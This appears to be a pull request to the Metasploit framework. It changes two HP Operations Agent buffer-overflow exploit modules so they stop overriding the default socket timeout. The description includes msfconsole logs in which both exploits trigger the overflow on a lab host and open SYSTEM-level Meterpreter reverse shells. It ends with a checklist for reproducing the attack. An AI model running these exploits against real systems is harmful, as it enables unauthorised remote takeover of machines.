### PR TITLE
[SeeRM #8443] Don't overwrite default timeout on get_once

### DIFF
--- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
@@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
 
     connect
     sock.put(ping_request)
-    res = sock.get_once(-1, 1)
+    res = sock.get_once
     disconnect
 
     return res
@@ -162,7 +162,7 @@ user-agent: BBC 11.00.044;  14
 
     print_status("#{peer} - Sending HTTP Expect...")
     sock.put(http_headers)
-    res = sock.get_once(-1, 1)
+    res = sock.get_once
     if not res or res !~ /HTTP\/1\.1 100 Continue/
       print_error("#{peer} - Failed while sending HTTP Expect Header")
       return

--- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
+++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
@@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
 
     connect
     sock.put(ping_request)
-    res = sock.get_once(-1, 1)
+    res = sock.get_once
     disconnect
 
     return res
@@ -162,7 +162,7 @@ user-agent: BBC 11.00.044;  14
 
     print_status("#{peer} - Sending HTTP Expect...")
     sock.put(http_headers)
-    res = sock.get_once(-1, 1)
+    res = sock.get_once
     if not res or res !~ /HTTP\/1\.1 100 Continue/
       print_error("#{peer} - Failed while sending HTTP Expect Header")
       return


### PR DESCRIPTION
These two exploits were overwriting the default timeout for get_once. It makes exploits to fail on slow networks:

```
msf exploit(hp_operations_agent_coda_34) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:1051 - Ping host...
[*] 192.168.172.136:1051 - Sending HTTP Expect...
[-] 192.168.172.136:1051 - Failed while sending HTTP Expect Header
[*] Exploit completed, but no session was created.

```

Hasn't sense limit the reliability of the exploit, so just using the default timeout on get_once. Modules working after change:

```
msf > use exploit/windows/misc/hp_operations_agent_coda_8c 
msf exploit(hp_operations_agent_coda_8c) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(hp_operations_agent_coda_8c) > set rport 1106
rport => 1106
msf exploit(hp_operations_agent_coda_8c) > check
[+] The target is vulnerable.
msf exploit(hp_operations_agent_coda_8c) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:1106 - Ping host...
[*] 192.168.172.136:1106 - Sending HTTP Expect...
[*] 192.168.172.136:1106 - Triggering overflow...
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.136:1111) at 2013-10-02 16:12:11 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(hp_operations_agent_coda_8c) > use exploit/windows/misc/hp_operations_agent_coda_34 
msf exploit(hp_operations_agent_coda_34) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(hp_operations_agent_coda_34) > set rport 1156
rport => 1156
msf exploit(hp_operations_agent_coda_34) > check
[+] The target is vulnerable.
msf exploit(hp_operations_agent_coda_34) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:1156 - Ping host...
[*] 192.168.172.136:1156 - Sending HTTP Expect...
[*] 192.168.172.136:1156 - Triggering overflow...
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.136:1161) at 2013-10-02 16:14:56 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 2 closed.  Reason: User exit

```

If you would like to verify:
- [ ] Install win2003 SP2 or WIN XP SP3 machine
- [ ] Install HP Operations Agent 11.00 (ask me for the installer if you're not able to find it on the HP page anymore)
- [ ] Configure coda.exe to listen on all the interfaces `ovconfchg -ns coda.comm -set SERVER_BIND_ADDR 0.0.0.0`
- [ ] Be sure of living on a small network :)
- [ ] Run the exploit, should fail if network is slow enough
- [ ] Apply patch, run the exploit, enjoy session
